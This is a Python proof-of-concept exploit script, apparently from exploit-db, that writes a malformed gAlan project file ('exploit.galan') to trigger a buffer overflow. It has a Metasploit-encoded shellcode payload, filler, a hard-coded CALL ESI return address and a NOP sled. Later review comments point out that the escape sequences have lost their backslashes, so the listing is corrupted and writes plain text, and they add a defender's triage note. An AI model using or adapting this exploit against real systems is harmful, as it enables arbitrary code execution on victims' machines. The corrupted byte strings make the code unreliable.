# Title : gAlan (.galan file) Universal Buffer Overflow Exploit
# Published : 2009-12-07
# Author : Dz_attacker
#!/usr/bin/python
# gAlan (.galan file) Universal Buffer Overflow Exploit
# Author : Dz_Attacker
# Mail : dz_attacker@hotmail.fr
# Original : http://www.exploit-db.com/exploits/10339
# win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
# Proof-of-concept generator: assembles a malformed gAlan project file and
# writes it to "exploit.galan" in the current directory.
#
# NOTE(review): as printed on this page the "x.." sequences carry no leading
# backslash, so each one is three ASCII characters rather than a single byte.
# Run as listed, the script writes plain text, not the binary layout its
# comments describe.
#
# Encoded blob; the listing's own header comment identifies it as a Metasploit
# win32_exec payload (EXITFUNC=process, CMD=calc, PexAlphaNum encoder).
shellcode=(
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54"
"x42x30x42x30x42x30x4bx58x45x44x4ex33x4bx48x4ex57"
"x45x50x4ax57x41x50x4fx4ex4bx48x4fx34x4ax41x4bx58"
"x4fx55x42x42x41x30x4bx4ex49x54x4bx48x46x33x4bx38"
"x41x30x50x4ex41x53x42x4cx49x39x4ex4ax46x38x42x4c"
"x46x57x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"
"x46x4fx4bx43x46x45x46x52x46x30x45x37x45x4ex4bx38"
"x4fx55x46x42x41x30x4bx4ex48x46x4bx38x4ex30x4bx54"
"x4bx38x4fx35x4ex51x41x30x4bx4ex4bx48x4ex51x4bx38"
"x41x50x4bx4ex49x58x4ex55x46x42x46x30x43x4cx41x53"
"x42x4cx46x56x4bx48x42x44x42x43x45x58x42x4cx4ax37"
"x4ex50x4bx48x42x54x4ex30x4bx48x42x47x4ex41x4dx4a"
"x4bx58x4ax46x4ax30x4bx4ex49x50x4bx58x42x48x42x4b"
"x42x50x42x30x42x30x4bx58x4ax56x4ex33x4fx45x41x33"
"x48x4fx42x46x48x45x49x48x4ax4fx43x58x42x4cx4bx47"
"x42x35x4ax46x50x47x4ax4dx44x4ex43x37x4ax46x4ax49"
"x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x46x41x46"
"x4ex56x43x36x42x50x5a")

# The file is five segments, concatenated in this order.
leading_tag = "Mjik"  # presumably the header gAlan expects in a .galan file; not confirmed here
filler = "x41" * 1028  # one repeated value, 1028 times, ahead of the 4-byte slot
call_esi_addr = "xd0x75x01x10"  # glib-1_3: CALL ESI
padding = "x90" * 45  # 45 repeats placed between the address and the blob
payload = "".join([leading_tag, filler, call_esi_addr, padding, shellcode])

# Defender's view: a legitimate project file has no reason to hold a run of
# more than a thousand identical values after its header, followed by x90
# padding and an alphanumeric-encoded blob. That shape is a usable triage
# signal. The hard-coded address suggests the technique depends on a module
# loading at a fixed base (inferred from the comment above; verify against the
# affected build). Do not open .galan files from untrusted sources in an
# unpatched gAlan.
out_fh = open("exploit.galan","w")
out_fh.write(payload)
out_fh.close()